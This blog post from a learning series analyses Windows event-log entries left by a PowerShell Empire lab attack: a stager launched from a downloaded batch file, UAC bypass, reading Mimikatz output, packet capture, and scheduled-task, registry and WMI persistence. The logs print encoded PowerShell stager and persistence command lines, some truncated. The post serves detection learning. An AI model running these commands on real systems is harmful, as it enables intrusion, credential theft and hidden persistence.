Looking at the logs from some of this activity as it was being performed during my learning of Powershell Empire.
First up, when the file is executed from the browser, we see from the Security Event Log that chrome.exe created the cmd.exe process with the command line arguments which includes the welcome.bat file.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x700AD Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x10b8 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1938 Mandatory Label: Mandatory Label\Medium Mandatory Level Creator Process ID: 0x15a4 Creator Process Name: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process Command Line: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\sec560\Downloads\welcome.bat" " ...
We then see cmd.exe spawns powershell, to read the contents of the welcome.bat file.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x700AD Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xbd0 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1938 Mandatory Label: Mandatory Label\Medium Mandatory Level Creator Process ID: 0x10b8 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\sec560\Downloads\welcome.bat')|iex" ...
Next we see the contents of welcome.bat being executed.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x700AD Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xe10 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1938 Mandatory Label: Mandatory Label\Medium Mandatory Level Creator Process ID: 0xbd0 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AEUAcgArACQAVAApADsAJABJAHYAPQAkAEQAYQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAYQBUAGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA== ...
Now that access has been gained, looking to see what the other commands look like when a request is made against the system.
Surprisingly, when the whoami command was run from within the powershell-empire interactive environment, I did not see any entry in the log.
While no result was returned when whoami was run within the interactive environment, once I dropped down to Shell, I was able to see entry in the logs.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x700AD Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x14d0 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1938 Mandatory Label: Mandatory Label\Medium Mandatory Level Creator Process ID: 0xe10 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\cmd.exe" /c "whoami /groups"
For the activity to enumerate the local administrators group, we see the following in the log. A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x700AD Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x848 New Process Name: C:\Windows\System32\net1.exe Token Elevation Type: %%1938 Mandatory Label: Mandatory Label\Medium Mandatory Level Creator Process ID: 0xa88 Creator Process Name: C:\Windows\System32\net.exe Process Command Line: C:\WINDOWS\system32\net1 localgroup administrators ...
Note, if you look closely, you will see it says net1.exe, rather than net.exe. This is because net.exe spawns net1.exe to perform this task.
For the BypassUAC, I saw the following entry in the log, which I believe is associated with the bypass.
First, I see consent.exe is being executed.
A new process has been created. Creator Subject: Security ID: SYSTEM Account Name: SEC560STUDENT$ Account Domain: SEC560 Logon ID: 0x3E7 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x36c New Process Name: C:\Windows\System32\consent.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\System Mandatory Level Creator Process ID: 0x148 Creator Process Name: C:\Windows\System32\svchost.exe Process Command Line: consent.exe 328 318 00000277C25C97A0 ...
This is then followed by debug.bat being run via cmd.exe.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x7007D Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xf0c New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1937 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xb88 Creator Process Name: C:\Windows\System32\cliconfg.exe Process Command Line: "C:\WINDOWS\system32\cmd.exe" /C "C:\Users\sec560\AppData\Local\Temp\debug.bat"
I also see ...
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x7007D Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1104 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1937 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xf0c Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAUwBJAG8AbgBUAEEAQgBsAGUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AQQBKAG8AcgAgAC0ARwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AFQAcABCAFIAawBPAC8AZwA9ACIAKQA7ACQAZABBAFQAQQA9ACQAQgA0ADgARQAuAEQAbwBXAG4AbABPAEEAZABEAGEAdABBACgAJABTAGUAUgArACQAdAApADsAJABJAHYAPQAkAEQAQQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAEQAQQBUAGEAWwA0AC4ALgAkAEQAYQBUAGEALgBMAGUAbgBHAFQAaABdADsALQBqAE8AaQBuAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
The above then follows the deletion of the debug.dat file.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x7007D Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x140c New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1937 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xf0c Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: cmd /c del "C:\Users\sec560\AppData\Local\Temp\debug.bat"
Similar to the previous example, I noticed that consent.exe was invoked right before the following was seen in the log.
A new process has been created. Creator Subject: Security ID: SYSTEM Account Name: SEC560STUDENT$ Account Domain: SEC560 Logon ID: 0x3E7 Target Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x7007D Process Information: New Process ID: 0x1670 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1937 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xe10 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAcwBpAG8ATgBUAEEAYgBsAEUALgBQAFMAVgBlAFIAcwBpAE8AbgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AVwBDADEAWQBuAGYAQQA4AFkAPQAiACkAOwAkAEQAYQBUAEEAPQAkAEIANAA4AEUALgBEAG8AVwBuAGwAbwBBAGQARABBAHQAQQAoACQAUwBlAFIAKwAkAFQAKQA7ACQAaQB2AD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABhAD0AJABEAGEAdABhAFsANAAuAC4AJABEAEEAdABBAC4AbABlAE4AZwB0AEgAXQA7AC0ASgBPAEkATgBbAEMAaABhAFIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
Something else I noticed, is they both ran whoami /groups before executing their commands. Maybe this is just a coincidence or something other artifact of the system. Who knows. Not enough time to dig into this at this point.
Below shows what is seen when attempting to access the mimilsa.log file. A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x7007D Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xd6c New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1937 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1104 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\cmd.exe" /c "type c:\windows\system32\mimilsa.log"
As the command was run to perform packet capture, we see the following in the logs.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x7007D Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1030 New Process Name: C:\Windows\System32\netsh.exe Token Elevation Type: %%1937 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1104 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\netsh.exe" trace start capture=yes traceFile=c:\tmp\capture.etl maxSize=1MB
It looks like when netsh.exe runs, it runs the dispdiag.exe and creates a file named dispdiag_start.dat.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x7007D Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x754 New Process Name: C:\Windows\System32\dispdiag.exe Token Elevation Type: %%1937 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1030 Creator Process Name: C:\Windows\System32\netsh.exe Process Command Line: C:\WINDOWS\system32\dispdiag.exe -out dispdiag_start.dat ...
Looking at the schedule task being created.
A new process has been created. Creator Subject: Security ID: SEC560STUDENT\sec560 Account Name: sec560 Account Domain: SEC560STUDENT Logon ID: 0x7007D Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1570 New Process Name: C:\Windows\System32\schtasks.exe Token Elevation Type: %%1937 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1104 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\System32\schtasks.exe" /Create /F /RU system /SC ONLOGON /TN SecurityNik-Empire-Schtask /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""
Looking to the registry, we see ...
C:\WINDOWS\system32>reg query HKLM\Software\Microsoft\Network /v debug HKEY_LOCAL_MACHINE\Software\Microsoft\Network debug REG_SZ SQBmACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAcwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGY ... JAFYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAQQBUAEEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAEQAYQB0AEEALgBsAGUATgBnAFQASABdADsALQBqAG8ASQBuAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
Confirming the schtasks was created.
C:\>schtasks /query /TN SecurityNik-Empire-Schtask Folder: \ TaskName Next Run Time Status ======================================== ====================== =============== SecurityNik-Empire-Schtask N/A Ready
Looking at the registry after the registry persistence was added.
C:\WINDOWS\system32>reg query HKLM\software\Microsoft\Windows\CurrentVersion /v debug HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion debug REG_SZ SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAYgBsAEUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwAp...QQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAEQAYQBUAEEALgBsAEUAbgBHAFQAaABdADsALQBqAE8AaQBOAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
For the WMI persistence, using autorunsc.exe from Sysinternals shows the following.
C:\Tools\SysinternalsSuite>autorunsc.exe -nobanner * | more Updater "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x" File not found: $x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Wrin Hidden -enc $x
There is so much we can see from the logs. However, I just wanted a sneak peak.
That's it for this post. See you in the next post, where we look at things from the packets perspective.
Other posts in this series:
Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek
No comments:
Post a Comment